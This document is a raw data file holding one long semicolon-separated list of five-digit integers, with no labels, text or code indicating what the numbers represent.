41262;57167;60197;37765;13540;15388;25797;33668;47164;26933;24604;53001;58701;54070;23871;35861;65868;51061;20168;53742;28784;57691;29083;42013;64557;34987;20178;53049;46015;41423;45381;36348;56689;50757;15761;63197;13455;21871;34822;62211;40027;37734;61896;23036;11672;18542;18878;47777;33414;38343;30052;27371;55749;38487;22727;54056;56836;62891;11732;59196;34768;13618;48313;60624;59600;21451;65446;14554;45071;17490;61113;65733;54517;34968;16585;65861;47310;30860;59823;30946;20014;60930;48502;37607;62201;50203;21839;37711;30358;26101;32260;34864;19517;51668;66201;63601;36866;42460;56927;27204;11817;52347;38322;66291;22617;29600;62387;20262;32250;12551;32246;25982;50731;42042;37841;13245;14078;44911;41265;32484;62427;41678;44117;16245;63287;57491;14659;54873;42412;23187;28990;63845;46099;18654;47586;35838;49069;28159;41701;50852;40940;25043;58920;52967;27986;53844;12428;10374;60240;45438;49222;26552;42973;41078;30526;11818;66011;18395;30264;16817;13315;44489;65335;34212;46688;10836;27005;54158;55150;56775;25917;13298;19968;52846;16045;49441;31087;61811;35326;64466;52752;64718;50558;55031;57548;33960;36493;46129;26277;42586;51261;51556;13241;26249;54140;35996;31701;59740;56817;28529;32666;22420;62480;20667;60531;20703;44015;27322;25981;14250;62290;16185;34741;29364;19994;12122;26199;22555;20472;66932;57193;55371;28519;56735;64234;29963;24206;25165;24842;38260;25659;62856;12618;60689;65476;27739;58785;45070;38722;47767;34048;57025;31408;48635;13826;47175;32819;14252;13321;25600;35280;33093;60050;42559;44914;12298;42745;54994;39102;21425;40718;48648;63037;60547;49949;60781;66254;27784;54187;50556;18894;13920;11655;62786;22931;21689;64245;58799;51529;65913;66005;65306;13281;54355;50309;52720;12919;13995;26787;35186;58230;30954;21221;43031;45876;45867;10921;26112;24704;66861;64080;33630;57800;66175;19561;25776;19274;10756;33793;29252;18488;35667;25093;37147;48897;34346;36432;44410;48429;58232;10317;52450;56486;57646;64938;56099;50282;63873;63276;65482;29663;42620;54664;51731;64332;37813;36939;18946;52910;15142;28803;27308;27505;62303;38958;40680;26538;37113;40477;25424;58996;25621;52070;42443;24856;52927;54674;51490;53325;33269;61021;33517;49750;23726;44108;56833;16179;63734;40347;53919;65315;62599;33592;11656;15351;65356;16939;52696;48264;62001;22590;20246;17474;29870;58600;16972;47366;27188;19136;35437;42105;44148;34365;30720;41137;66808;25191;13791;51508;42043;28481;46181;23291;31523;29231;11792;51292;50811;55349;29738;21481;12987;16344;11305;52601;43428;20271;17276;33523;51426;13616;11891;35092;37060;18286;59486;44231;27844;14530;19049;11777;28599;64353;51941;62271;21463;52539;39340;35884;50146;58534;18154;35544;54410;15481;54124;28691;21300;42049;23120;34616;11246;39206;43850;28899;64081;25509;22984;61497;35512;15359;53385;62715;26093;56596;60587;44593;64381;16472;29954;42484;46992;39589;30577;51241;40626;12681;10668;45920;39567;47194;17169;11717;10262;36580;31839;44961;21602;55461;37966;56821;37766;59220;43718;17979;65097;28291;64411;22936;35967;62311;23003;55750;65998;59980;66818;64916;46955;29761;41009;39842;18632;65606;42434;32754;63981;30157;46363;40640;51298;63631;66571;21796;24714;57333;47790;50804;54004;24599;12721;43121;40024;17208;31433;55671;14639;12456;66534;64132;20699;26923;29824;39073;19881;49552;29717;57930;57383;40267;16596;16108;35147;10151;58963;63202;41154;10193;34035;44834;54810;16833;24253;56149;31407;35088;10375;38543;12709;36987;22877;61106;26349;36087;36664;48943;53284;55986;14900;41641;44104;42517;48591;19673;51711;45392;58371;47341;28620;33306;65388;11147;55486;51583;11234;42958;59942;63901;29619;18123;16235;25214;39165;56090;58314;54470;33908;49840;48540;21553;56196;59753;63968;63248;62665;32019;66803;42606;35063;19508;62517;36916;55938;33007;32895;65463;19912;44279;49424;43526;53155;42688;64539;40173;18662;29440;64057;40628;20532;10820;35386;19603;22538;28524;56268;27413;41267;27745;55962;63851;29993;16583;35438;23611;35080;31442;55083;25054;56110;55985;11833;33638;30098;45410;44229;51062;28943;29695;19816;45093;19719;17176;25391;12322;29507;24529;64792;21548;17432;17517;59199;43015;53131;31201;61835;57501;40246;47579;43274;36726;24634;12592;37741;22275;19578;38607;22886;44138;65507;55569;17812;21535;16340;44999;45974;32017;35987;44303;32882;66343;37955;52474;25873;49172;45886;30514;64974;29750;60311;27780;39675;31274;63293;62781;60667;26941;55049;51504;43174;42489;18524;26990;55182;38887;14754;36416;31136;35295;21424;54492;30840;18743;34095;43615;57081;30144;48729;48393;35673;62072;24750;16446;40166;66531;49192;31749;39312;24267;45122;32902;63613;26283;61708;33315;35794;40099;10586;19084;12879;40769;45142;12817;30938;47429;14042;61356;14126;64488;32303;16014;55558;56841;27366;43384;36050;58050;45113;24972;40845;57975;39805;45534;21735;14621;41643;46008;48310;50684;41546;46862;32602;58782;48239;32097;26326;61289;50785;42603;66765;19040;42047;48214;45333;36800;23268;44664;36076;26822;35643;10006;29078;23416;16217;64348;41042;59438;29585;47271;10808;22897;30624;19521;16044;60483;43937;15809;40542;32411;35014;24173;14558;58005;51391;63170;62331;31217;50210;24815;11633;32922;10818;24042;19754;41312;29390;34333;13466;11295;34860;11060;32996;27040;59158;60679;59807;33994;60376;50642;24496;23131;44526;49795;12216;64671;39009;65723;41896;48262;44884;58195;33005;48974;23226;50992;42816;61964;34764;24353;54077;59657;38207;35886;32583;26775;18959;61336;21275;26292;34862;65179;48741;28310;59326;33725;53664;30816;30380;20212;65821;31872;17622;60218;17197;63580;49410;41437;56745;47014;35657;59421;66906;46064;15623;63572;40720;16276;30850;24743;52384;21135;45295;63417;37887;58463;62235;25083;24326;21241;21578;18900;44641;33040;61442;16335;62921;46786;11029;32584;46287;28847;59322;66679;18230;36354;31688;48856;49802;58508;10618;10899;34021;39171;65236;64101;44155;21768;46835;61543;49836;54133;56474;55794;18103;38943;25408;32724;48617;27417;31759;58560;11670;62010;45238;59195;39757;57270;22236;40450;52273;22265;23170;31992;22719;20169;33773;19640;28687;18937;48208;13217;55984;51194;35629;44927;31942;42708;62661;24863;52621;43187;30867;35758;21021;23440;49699;25684;10054;46121;32167;62267;30818;58313;52307;36994;60687;42433;58359;15043;49217;17464;43393;13156;27969;11597;54601;54676;40062;24933;65487;16052;38686;47256;17266;32878;66762;51669;46125;29366;54199;39488;23703;66224;16921;40398;41873;11881;38634;57700;23936;54084;43305;29578;30061;25373;44036;66682;25761;32466;47889;11080;14690;20336;38601;34902;13228;10116;20139;61533;36067;58646;57935;15440;15165;29263;28009;10592;10416;38283;52162;54685;34515;45027;45711;40020;55988;27651;16854;30619;22000;25242;35214;40644;51873;26129;23490;37763;65012;27377;35509;20460;36899;25176;31753;58837;23748;45358;26067;22066;23507;36743;17398;11363;28728;35490;50932;51415;52564;48983;57296;32796;18967;64277;55812;45196;62067;42651;43782;58014;22441;21808;11665;25625;64649;22985;32427;38419;14736;10861;21840;11401;12884;38080;30718;42731;38685;40441;58502;11566;26209;25119;26819;31663;62171;18824;65762;55226;36191;40383;63862;28436;19888;51327;32127;36025;33917;15452;63823;11876;28362;41644;13506;48798;38035;66121;21836;64405;32232;64117;40104;13942;26910;23916;32929;28607;41583;53147;53612;22478;47533;28513;37520;21531;22958;10061;14995;53451;57489;34102;45901;58297;32828;36165;25461;49882;58007;15542;57100;45340;40184;42934;18373;63390;46767;37240;65219;45701;63706;23737;66354;16151;32771;32084;54085;40880;51059;24756;25585;43606;12992;20571;56381;13147;26913;21673;36708;34036;13080;40650;55610;51066;26500;35427;37958;14908;33292;50397;65524;61769;36889;23066;42521;60944;44859;23773;21172;60787;30083;24515;46337;19145;12719;55551;63052;59914;26163;53530;42119;31275;59700;32227;62472;59150;65942;63010;45997;62336;17764;61117;47736;33437;29397;39547;10867;57936;25718;57238;61935;31808;25120;40995;55388;57956;52455;10991;48525;40740;39978;53462;10239;40473;39267;21521;33125;25444;44990;66497;41362;10519;61573;21272;39042;27552;31483;46661;52990;13631;23680;10038;41628;14563;25881;47311;23282;32493;53659;11834;61752;61541;29148;66941;45873;11995;59496;61377;57028;25799;58281;66628;25591;34011;37527;48343;27404;63890;13977;53688;11238;36104;12128;23719;35919;66540;22737;66098;37154;26627;21400;44713;33270;56776;50288;55772;66876;18291;26455;45610;28957;18665;36911;30922;43455;64728;58994;23437;50667;33632;28686;54842;39459;26995;62228;52722;43487;28740;15975;63626;37030;39088;52756;11706;52938;55119;32881;25866;44805;37630;13411;31967;58392;56234;11313;10046;12304;58364;34628;42359;44877;25512;40106;22939;57121;22334;50033;14708;20696;61665;20905;26290;62723;41248;34198;24931;36931;50711;32437;49256;58700;66342;58386;37227;43113;49656;21560;45117;25521;22773;47138;11050;54382;63472;11426;28239;41650;38154;13987;17748;50991;54553;32848;21532;23274;59331;56648;61269;59590;13159;13250;58385;22827;40271;22357;13731;51264;18602;60267;10279;50254;47804;65970;54396;22206;29185;11452;53048;22163;12077;14260;26917;18582;12729;17570;43554;39807;43590;29890;13125;12315;24105;31016;10540;53326;34370;65729;62725;21252;37039;60505;59053;60339;23094;36016;36533;40956;23794;55231;47565;17477;44730;51846;31021;21139;23600;39480;34986;58902;45566;20744;45887;23763;27062;55194;17008;16713;58369;61215;34939;65585;35360;28592;19330;31736;49880;58124;66489;18202;41620;38537;59802;22531;50045;45668;51230;29790;10267;31599;54858;14056;43717;65230;57282;17302;10975;11301;49428;39840;62008;27265;55204;24826;44665;11409;58287;24289;37265;34931;42413;52727;60885;52187;36492;42272;23185;35843;10472;37985;12917;45782;54555;39341;48411;14357;26407;38658;23982;38719;35236;20682;61621;15539;30119;23347;53137;59180;22094;14876;54022;54539;16518;10067;64359;27271;49749;30544;47583;19810;44330;48970;43055;32039;21386;52821;62073;58338;29270;61345;31298;29131;46687;54453;57321;54294;14289;65834;33121;60634;32213;30861;16493;16466;41168;25590;26876;36729;30741;32202;56958;23011;45714;63837;39220;57836;12113;41935;31315;61590;29848;24215;62959;41967;62180;12215;10799;19159;36785;30129;33972;19974;63789;44710;55239;54219;39530;60043;13264;21500;25944;63569;64230;44030;43859;25179;37261;42262;25653;55420;61168;37192;26799;60455;47519;60897;63699;13410;63497;29721;20957;63756;44763;65006;22305;63751;32430;23602;13062;65292;23050;49450;34125;54302;43409;13573;27141;57524;30708;55529;43895;38965;32714;44840;45815;13389;45377;57869;14973;27946;49645;36381;18307;56953;56580;15407;19844;61853;22317;23665;36682;30149;42823;17526;37697;10162;53219;13342;21645;46450;21687;20249;63893;56266;51249;12108;58044;38174;52837;40417;53484;29526;35362;53995;24500;49505;53710;30270;52858;21952;32311;57866;43306;58379;47814;43401;41991;62326;49571;33246;35347;59691;64052;39898;53275;44856;34059;39583;42452;51358;50639;11115;21662;59579;12996;49241;23712;35865;44196;13673;24600;29382;41879;29771;51590;20648;27445;58910;37945;56797;54024;63456;22386;60722;29433;23706;19505;36543;22180;39714;31270;32442;47044;48294;25162;14321;25660;16030;15140;59341;35559;65135;23686;13362;41741;25993;23212;27399;26245;22355;46482;40056;65416;37846;13950;66286;21285;34352;41220;22133;30060;60144;30683;50687;14043;25459;38450;62386;31285;26220;62160;37078;37254;55262;16001;65890;19133;64639;20360;37873;49046;64555;35109;20733;61153;36792;60427;52113;60674;27764;48390;28154;51130;55425;31127;29286;30779;42425;16699;34678;15683;54861;24487;42669;51703;65106;15632;62677;35974;39651;29401;45297;43192;54761;42619;34242;43254;24444;30178;34925;14562;48184;17081;45773;66325;11436;47663;38993;50223;27955;62409;66634;33212;30085;51747;39303;21919;16641;31014;11553;65346;14034;14771;66578;52666;50016;53539;46653;66708;30687;44359;42737;22297;49237;27037;55003;65783;26395;20567;27571;17237;34634;10649;47201;52952;64714;38683;59230;28187;26584;65704;52233;21267;38644;29728;42658;28251;59924;64636;38827;49867;25463;20061;41573;63082;33729;22138;48175;28256;62169;18795;19377;64463;32951;26970;59226;61945;59409;50967;59935;43382;51559;13647;45893;35700;19947;54655;63599;39170;28215;28265;23899;24846;64565;55553;59852;45084;49837;29036;38649;59899;62468;38824;39511;19929;56055;22702;38892;32304;28709;39813;24330;38796;52565;66192;11294;43738;28837;17509;54832;23177;41943;17592;32481;25064;33455;34305;59895;10900;56633;20196;64220;39872;37540;30479;64621;12026;16146;55097;53729;38614;34061;58825;11390;14019;37367;63409;12691;66231;11195;56824;16570;59121;52202;34248;10680;60249;37137;37564;57955;28925;42754;40282;55181;64295;10285;29133;63130;34951;54229;31331;61275;17456;58695;28367;16738;46771;37920;25610;47233;55505;49890;33682;54214;55694;65577;36545;24948;36044;58675;35755;34456;22119;34713;58049;47181;35571;42358;25870;31573;42866;14038;47524;35064;26305;13261;18258;63179;62307;59776;40009;43098;17602;24171;66430;32195;48275;36436;17194;29346;44937;65790;25071;30918;56396;60312;12497;13749;35834;35746;57625;24157;36120;35294;49776;41642;35084;66084;65732;55777;35493;34428;44844;48876;31912;21868;59210;22805;40400;59481;14470;17620;30686;49234;59309;24816;33069;35219;45442;64983;54384;28341;62899;59145;56864;31687;60672;33318;32331;50198;63858;33723;35664;16988;16926;32736;27467;17328;62706;50375;61978;31418;64063;22324;42625;47903;47569;61755;31430;32357;24126;33766;56919;30864;53604;60894;34780;21947;25457;14501;31118;29459;31764;30093;59529;21253;52182;41412;47511;37208;27016;52524;50628;23983;53874;17344;65611;60127;17362;49446;62592;35130;29320;56141;53624;39808;55729;29770;15213;39638;58394;48463;44390;30445;58923;61925;44885;36559;48724;27396;15717;56251;46079;56865;60913;42036;15766;21146;24982;52594;33804;25192;41315;39416;15998;62982;53493;41356;65717;20121;59061;13816;15150;14684;22057;22033;23557;52365;27731;31132;18490;41276;56333;35874;20243;23563;35190;62009;64827;42021;45825;34993;57985;11101;27108;42159;59611;20018;47518;14746;37710;44409;25117;42302;49832;43024;59273;59484;42583;44143;47237;33381;61786;33302;20281;41287;48536;20203;11464;39261;14476;50067;32551;49091;34740;14701;33397;40143;16913;42748;51154;27791;28253;52431;20266;43607;34845;39587;35303;43593;12938;20270;39364;37749;66078;39855;45501;24000;40126;38358;40646;48196;19721;40479;40861;65144;18084;56560;50834;65433;14836;42697;38032;38673;47236;65321;19919;14083;33017;59348;51376;35926;53840;43527;54388;23146;64606;41627;34812;16326;51768;33625;33825;47445;62448;13798;42345;20086;62167;36327;61943;49103;62123;13807;46381;42108;39256;53854;25023;52256;66066;55550;40408;18987;56131;24213;18227;42008;21306;41426;57467;28572;45546;37575;33217;13387;16027;39045;66276;51308;31594;41269;29899;56075;61354;15648;20134;56261;31425;43626;55155;11874;20309;10137;10357;59595;62314;13962;22311;34824;61362;50673;20755;46198;11389;43153;50467;49363;24220;45331;31549;26365;57520;22322;19063;40982;47038;20841;20469;60790;50330;51393;51999;18127;31147;23159;51566;40310;39532;34579;38717;13578;61917;43918;12311;13388;36052;15944;14296;23112;39817;35516;18417;64644;11010;55298;53891;15023;17491;46213;64961;24401;11700;29279;50290;45204;56627;61472;29917;57801;29437;33915;33089;18796;24936;10364;38517;22092;46410;41570;43348;37859;63490;31581;33867;27608;45916;19656;31171;53249;42132;16934;37187;38244;42663;12898;57580;38847;60620;63187;49356;46302;36447;58395;52848;45449;17192;54520;32137;60988;33183;60428;35846;42336;26997;25735;58168;12752;35546;63519;48185;13919;65489;19990;41526;66461;48144;18600;45545;18834;26275;34718;19983;11356;35117;58884;26494;16769;14721;35833;30809;43497;26605;49824;34097;25788;12866;48487;46014;46320;45550;59021;31048;59294;51502;24968;13929;60810;29877;46131;31046;62117;26772;57203;12470;43014;27254;15316;55216;42212;12976;65276;23152;44011;49957;56340;17018;56376;37264;32512;14116;13187;56603;21639;32428;32028;18522;23666;49976;40609;57302;43729;60431;62828;18973;23539;10634;20950;30474;36788;39334;57015;39689;42699;57483;35986;63325;16940;42529;57410;60813;37178;11501;65380;66140;42041;54403;16618;18097;63660;49896;26573;28472;25889;56411;14378;51994;56553;33066;47628;15627;49173;63334;32142;58015;26649;48271;10708;61956;17974;40784;59509;33662;51948;58378;64423;40125;23795;12379;62905;33791;21801;50456;19855;41112;24981;11445;13166;29090;49074;66555;48362;11214;62831;65352;61129;52220;42945;56752;65692;31451;56389;64324;44318;18999;43413;46954;24820;11886;49281;41883;15847;47809;44963;40384;27886;43912;33457;27455;45666;28274;40525;44379;39736;26611;42898;66428;43955;19257;53053;50952;19045;17299;31400;50341;62560;14943;26109;63165;34332;34291;38864;13325;48646;62373;30931;50047;54270;25175;34725;42827;10247;48879;33131;63772;45002;45489;44499;23725;12484;21719;40836;21665;28036;38411;61969;54488;25872;46445;21514;18124;18243;14763;61729;14144;47245;29659;65263;13318;52296;20787;54360;49197;45842;17184;59934;33661;60363;46334;47751;51503;36599;47485;16762;14760;30187;33182;61479;48194;51697;42946;40231;44774;60146;61391;44406;34141;51543;62018;58402;63235;36528;43459;41178;51015;10522;29720;25283;53523;66644;25863;20676;47352;53205;49594;19762;20773;56017;59813;29281;15667;42715;42083;65964;23387;38539;33513;24835;30163;32799;59351;35653;55240;31401;40481;65528;42720;34553;52744;44433;42950;36314;33147;65940;17677;37439;16160;27895;52136;43056;58190;34774;54061;42895;41852;35330;18637;46915;10903;27555;28761;19334;53050;32706;39793;12447;24239;60004;11104;13146;45836;57970;20783;35748;65379;35811;48750;38408;51764;30477;40395;21780;48187;11046;58117;49959;45861;39435;48800;20792;38495;65182;51896;33080;19236;40900;53074;28694;47763;39299;54450;34679;20132;56545;22779;56808;43727;14980;64210;19014;53593;28823;66794;17693;64489;16288;55145;59789;63242;57712;27940;64902;15476;37568;31492;28591;32061;34020;23286;63839;51138;42696;26010;50863;13688;28678;14482;28616;13145;21683;31019;28827;35011;49274;57064;59982;20174;54949;49596;65511;15478;44388;35708;10604;45090;22411;19823;20720;28068;57608;20019;49788;63507;49512;54394;12940;42228;53967;58455;65038;45508;15324;32880;59030;48292;22141;34478;61857;55620;23083;52305;43676;60932;11451;45083;21713;37101;23007;36732;37237;14923;43968;49852;49925;66885;14404;11546;48890;33240;32598;34820;60596;20099;52371;21923;35642;61360;40458;63959;21670;13986;33106;66496;33591;51977;56456;52607;50790;10971;57849;48576;37977;23355;49564;64311;63193;18244;34225;17353;37173;57570;29755;33710;44445;54047;61093;56902;63863;54183;45467;22913;35442;51563;52110;15913;15003;19627;38313;60147;65631;22272;25947;14131;53733;18448;33422;39742;44850;47219;28306;33636;44226;50618;41694;50914;40265;29376;20083;44257;42690;17728;11530;59647;27577;21212;60665;33286;34889;14058;19830;47640;52183;24594;62265;34130;20195;22656;55134;30215;48596;21210;49591;54299;13351;61381;35823;40881;57803;32566;57032;37882;13423;62615;41558;44748;13472;29743;42001;44790;34884;25558;43826;36915;63391;20592;40661;55798;10341;51950;40487;55802;33949;37537;26823;14785;62614;42553;24394;49365;24524;21728;56209;65228;40664;63200;46078;36711;15757;24383;50722;32923;49389;27484;48552;36100;43724;64945;24891;55593;52438;14503;18548;59367;16564;17125;66387;23708;11468;51987;13609;53899;19444;46959;61722;61761;49516;27066;11094;53662;29783;33012;21505;52011;59114;56686;11497;10485;55741;19539;24293;11192;49667;16479;51143;57044;38399;54900;63852;53868;10082;64595;49373;65074;56288;26859;29411;43582;64878;64988;21215;49599;17289;12978;51142;24049;32612;45639;36658;54206;53449;23249;46045;51102;50574;65323;31204;34618;51196;15709;37102;34480;10719;12523;23277;54196;30469;61447;24890;18119;44969;20112;30170;49336;25626;25571;15370;40777;35426;66865;23068;20741;21049;30077;24226;48709;21547;10379;34778;11057;54482;14162;21312;45412;24550;61116;18171;40196;54734;61997;12465;36577;30904;63158;63554;24520;42580;14903;12463;20405;12696;54098;30116;33327;50765;61350;57279;62017;33020;62070;43120;46794;21471;40868;13940;51845;20525;31112;64524;49567;54150;43146;48243;55725;50695;35174;62869;23861;50691;26660;49989;23598;20688;10408;24276;51268;64005;26844;37129;31777;42885;24526;62037;35243;46595;64898;29683;50520;15923;42003;49148;61951;18384;54725;24998;56217;41292;51695;31472;63238;60135;35191;34300;17099;57965;56653;53930;39005;31008;15530;28615;35129;39424;24025;50591;52368;32276;21027;19052;66420;17239;51315;10839;20986;35649;13133;38230;17271;25593;44767;59476;58589;13787;35053;40490;15151;26191;24877;22834;42649;29485;35670;21417;27470;39830;15736;27937;23315;28882;62249;60220;45616;65701;44222;44897;25244;50679;45345;45848;19055;33287;35845;58121;38235;27806;48833;43836;38973;19210;41590;22724;58438;55398;61179;51099;40859;49138;61639;31349;54427;66417;35475;45844;64470;50356;26930;19335;51541;41576;14246;13465;26216;62411;64780;13923;52326;35439;31517;25774;32904;59851;18360;53208;16210;59468;57023;62471;62846;56835;20915;13494;19869;31172;42122;60165;49811;41536;26838;19722;41117;26556;55956;50706;59676;55174;62980;57107;44944;38267;16241;61288;33843;48764;47621;45818;58305;35738;63722;38530;34932;27449;58871;32916;29780;47898;44119;47295;63364;32701;35589;14134;60718;22587;45243;16209;44050;23429;47202;61430;60472;64929;38913;12198;25535;37941;16347;63717;21736;26653;35144;47263;26967;49433;57149;36989;47318;27668;61619;19480;51907;51374;58984;15608;63073;60448;62958;53594;18889;12421;61714;20104;10458;59439;16327;42307;51682;43998;50669;56781;55519;57473;21342;56466;51361;45884;20967;63384;42741;20017;13945;21013;16948;64658;14707;20320;47148;44130;38701;66584;14313;63882;31276;45979;40870;25505;52925;20455;62041;56410;11954;36181;27339;43196;61263;11838;45735;59454;15810;59206;66397;45860;34189;55197;19778;56353;43085;15373;52547;46885;14915;63880;39254;12541;13291;33993;30565;45621;37028;54862;41609;15969;26172;29316;62581;41086;61233;27026;65164;27025;42707;38367;29888;54288;24197;27224;64500;30492;46214;15551;10356;59752;30888;45781;58511;22924;32000;22251;60648;52545;29911;30510;47818;28089;11201;22250;20605;19569;61780;53248;31468;15377;44655;33137;57096;21992;25233;61809;41915;57359;22696;57766;11483;61751;44557;26971;49862;26850;17688;25541;39999;51684;23510;52354;27573;66912;44340;22921;52762;22407;38603;39081;51936;20797;57405;52293;22839;42770;55922;46875;55117;36655;17446;30950;49259;12843;26007;52145;11023;40167;41817;21213;42011;11767;36635;66141;25579;28336;66551;57298;38025;19558;44151;37476;17618;18545;50777;13901;30030;27301;52485;35678;12281;22264;11328;18513;40138;26881;27498;16781;22205;20807;55767;44120;60477;21164;47652;40175;53942;31086;28329;31826;54836;58940;66113;37595;15645;22313;54007;51449;21406;64954;52533;11532;16778;14675;63991;13114;11648;17610;61392;62003;66403;12892;55840;65383;42028;37162;27878;63011;35035;54705;39768;43973;51939;21751;63243;35727;16617;62672;12903;62600;38291;54767;42728;36837;15635;10676;53283;53841;20595;18359;63216;44293;40591;24666;57572;17209;33619;56418;56602;36195;32581;47357;56452;61009;12454;46775;18265;27889;56457;21824;20403;48628;45678;14054;55734;66050;10123;62173;11325;43432;55957;59689;46103;23280;33475;45888;43620;48627;36531;32807;41416;23019;66448;48855;14060;11802;44367;62591;57381;18533;19861;41511;24398;11059;65112;39390;48712;52161;48791;63103;49673;38211;56383;45949;53516;40951;52894;18288;58332;19424;51205;12954;23183;16517;29092;13832;61847;38252;46442;20599;63950;57681;15568;56739;58656;37691;36534;37834;39273;34191;19511;51575;30280;30305;16360;23987;48657;18157;14097;50835;11749;49539;65018;50416;33778;18006;41380;50696;57216;65214;48159;12810;41049;29230;31732;54784;39249;19867;54042;43950;20325;53675;18819;44472;31024;23556;39061;48868;51082;25901;44461;65474;40986;20291;54786;46132;64461;46548;59763;31257;23752;14697;54544;48410;54794;51158;31567;28309;56534;55832;50057;20435;34585;54570;16732;18777;44385;19534;34067;30213;37376;58669;66082;22723;60307;58719;46108;45958;24799;19800;47500;34676;11884;14728;13302;38786;19051;63945;20450;10814;63102;39701;27245;52780;16608;27402;13171;41529;13659;29999;49787;15606;21487;51197;64065;60879;25412;52922;57278;64195;47188;35555;38647;37634;39739;36598;55111;16295;50087;15828;32347;20999;33059;19281;66202;25874;21301;26086;62502;24342;17249;28532;34995;52090;37743;60916;41697;66377;17664;53811;60998;45337;65588;18896;25736;55735;24700;39924;30766;66602;29525;52243;36748;31751;55950;39326;16468;46217;53991;44456;37670;18112;62866;13006;40603;26589;28750;37714;47421;56903;15892;32651;19262;23213;54589;31381;19160;36755;11795;50488;61361;44302;63269;47065;16682;18836;52439;63850;30621;66466;20528;55058;33981;61828;24589;12257;58323;11772;60798;42067;11877;44872;13555;65115;61646;41651;58876;57730;57338;48626;38316;35346;57663;12628;31062;59780;53765;56519;26020;24434;50507;59051;32475;50555;45541;65785;30274;62103;59169;43797;52313;22086;40630;36458;64196;52014;20789;62949;36829;31705;22308;57916;22579;66698;26973;45522;43460;35277;36735;15536;55241;19860;25222;58824;17348;12279;48941;61214;30127;63649;22118;28487;48841;51406;50434;53605;44576;24074;66623;11938;22074;66501;31932;36014;38082;42224;65995;41027;39513;64919;36417;59217;20051;59175;20523;55105;44008;48772;65072;64689;31312;33512;27607;54499;10638;51049;58705;20665;44005;63420;14243;21063;47170;48386;38950;22934;65814;37079;25613;36882;19416;35003;37336;24930;32471;14545;22198;54015;64906;29487;59445;14130;34592;31925;50189;21207;57260;19364;33323;47707;14438;41254;40307;62040;66616;52970;49431;51557;34502;59913;12467;55200;39952;26006;18486;38216;60612;61535;49370;16695;15306;29649;45126;57972;22371;28692;57041;26676;51313;11039;15353;59264;46202;36349;12915;65753;34003;63220;18678;14023;58456;45235;16494;22037;16614;28323;32788;45430;53152;58545;55641;40807;31457;16834;29982;17037;19367;38486;64626;17129;54238;39568;30638;34650;46720;66320;34657;35343;42361;33522;40889;50754;62356;52292;27446;12806;19077;29515;28799;54431;46781;62421;32857;11620;30886;27240;57237;37483;62066;32114;22013;29973;51748;60584;28289;53365;24019;59546;31587;13527;59040;61982;62349;51657;52662;39028;33351;26962;36746;45609;43087;63129;16796;34315;35203;12423;28261;25959;56564;43358;41363;56324;35445;42936;29910;63231;65250;24638;12571;34135;52803;14035;51397;27929;56228;15550;51899;28905;58144;58854;26855;60509;27669;59578;52815;18708;18841;54446;58516;14256;38844;56703;66252;29016;35905;32445;35586;60166;27741;56378;62601;25295;20862;45416;44161;16194;23426;10087;65529;26820;50860;13819;55325;59462;36316;27756;61451;26039;15916;62298;53932;29905;51165;41409;41601;32486;33184;41006;24107;11910;45454;29842;25765;21629;45962;26784;63855;39304;28422;50258;52704;62514;64468;27451;62174;19655;60126;50092;17157;10051;56710;40638;59901;63061;42880;30377;15172;30739;49231;49436;22876;27422;14583;62730;27257;66260;40864;54923;35807;52232;53418;26418;37232;49714;32110;47892;21678;23929;45868;19683;51331;41038;29902;50575;52430;10035;66956;29817;35021;59100;15885;31162;56113;51892;66811;61523;27898;46117;42219;63723;17657;21293;24766;21319;56719;32505;46618;36116;56485;27049;62024;37928;16273;22938;60331;64047;44137;61676;27261;11473;62816;43327;52551;43831;26593;66304;35979;43356;53483;54936;34686;14232;27418;29977;28974;36412;16521;13266;58582;37475;64522;35181;15846;15117;38156;50996;20028;53794;38510;12043;65065;56977;63929;53526;23538;19197;30250;54566;48366;14025;15317;50598;59070;45308;32207;54162;36477;12440;34492;40082;60759;35891;56642;29297;56640;49772;32802;21995;25895;29736;19923;34516;23934;17695;45159;43350;30143;19235;12060;52758;18041;53162;17646;19856;38562;57262;15170;60515;16427;19290;43323;21613;41394;51639;46229;46041;29847;43131;30647;41435;10089;56301;44941;48550;26980;21903;29081;14589;22879;11430;24462;63761;43668;32369;14582;25977;30525;29304;52366;57830;13440;44823;17240;33464;45229;63479;48520;42962;29958;51638;57038;26836;54461;40297;58156;39604;55768;59197;25477;45783;35409;16267;46106;38341;19466;25353;61710;66960;46272;16136;19527;13068;59043;58509;25906;51877;23074;53438;31426;31367;43075;60047;53555;21014;42798;47290;28242;26993;26738;37437;12694;17380;20064;22825;54142;15456;52772;30970;59009;19820;58573;53954;18204;55603;38416;52729;40160;25428;28982;19448;35805;61219;61282;66279;63900;27802;64616;47458;58500;53196;40711;16343;27684;38226;28706;34201;18328;23574;14327;30226;41807;59225;58143;44466;14487;35747;59112;27836;21880;52975;17763;37385;23472;13117;27633;20850;20442;33796;49950;47232;54643;54245;16303;34613;58346;34216;60366;53751;64677;64779;21133;27291;57833;36178;18143;44485;18480;56972;32824;27217;65440;48188;32783;31412;46983;25326;31145;66308;52558;20173;62736;21893;60801;54289;52555;13456;19019;30520;36213;62898;48882;23591;51757;11403;17705;29906;49371;55942;56733;23910;11509;20454;17971;45076;26223;40453;35255;52216;65662;49183;16183;17662;25475;18584;19971;46477;12397;14027;20559;36279;16216;54027;46498;59246;58749;23873;40174;50619;24032;18094;54773;48713;34002;30057;26080;53319;66800;65270;43885;59554;53749;45924;15174;50053;59668;22030;40917;66122;51767;27510;23486;37462;50035;56210;22379;40601;58487;14608;12797;14613;55124;44249;35770;39704;65578;16278;59516;55416;52694;12272;44271;39315;11289;56563;61682;43064;49528;59302;61903;23540;51172;35702;65989;17760;60949;34304;24470;50225;29811;66311;46874;21009;34907;32069;59634;42203;40218;54050;30813;42091;46927;54078;57494;63347;47225;40759;14740;42811;21447;43540;66399;19553;28875;32617;41799;12404;51857;29944;59993;53397;26677;23638;61450;56970;16229;19106;54500;36009;63503;44019;60185;35676;41966;17391;38480;20122;60652;41742;61855;13632;32511;39466;41246;16667;24647;43642;55284;36838;33688;34594;43347;38893;53352;40362;50321;51444;25747;51681;42229;13994;23040;10347;20948;46149;30251;61055;52856;59795;10810;16628;65413;65793;24734;41016;32574;11197;22759;11632;20715;29784;19960;61077;58903;20328;30303;29831;52025;10382;25141;15785;28132;62727;57768;57230;16919;54787;27282;11793;52624;40113;12596;66095;19102;65581;25100;38004;63718;17329;60380;42845;14139;10507;37792;62244;39050;63611;59281;57255;64650;60886;65419;45706;14937;44070;20929;21554;56112;16816;30081;58536;34358;13642;38040;13189;60706;24669;55350;33002;55442;12887;64261;15552;59713;55788;52665;11762;55383;35209;50469;59334;21882;14768;35913;51520;58538;24282;